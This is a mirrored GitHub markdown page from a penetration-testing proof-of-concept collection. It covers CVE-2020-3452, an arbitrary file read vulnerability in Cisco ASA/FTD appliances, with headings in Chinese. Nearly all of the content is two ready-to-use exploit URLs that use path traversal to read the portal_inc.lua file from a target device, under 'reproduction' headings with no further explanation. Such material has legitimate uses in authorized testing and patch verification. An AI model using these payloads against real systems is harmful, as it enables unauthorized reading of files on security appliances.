Penetration_Testing_POC/CVE-2020-3452：Cisco_ASAFTD任意文件读取漏洞.md at 6de1aa5b4292cfac84027a5065d7cf88dd9014a0

admin/Penetration_Testing_POC

Fork 0

mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-29 14:04:25 +00:00

Mrxn 42e08ab8f6 add CVE-2020-3452：Cisco ASA/FTD 任意文件读取漏洞

2020-07-23 21:43:21 +08:00

485 B

Raw Blame History

CVE-2020-3452：Cisco_ASAFTD任意文件读取漏洞

POC1️⃣

For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

漏洞复现情况如下:

POC2️⃣

https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

漏洞复现情况如下：

485 B Raw Blame History Unescape Escape

485 B

Raw Blame History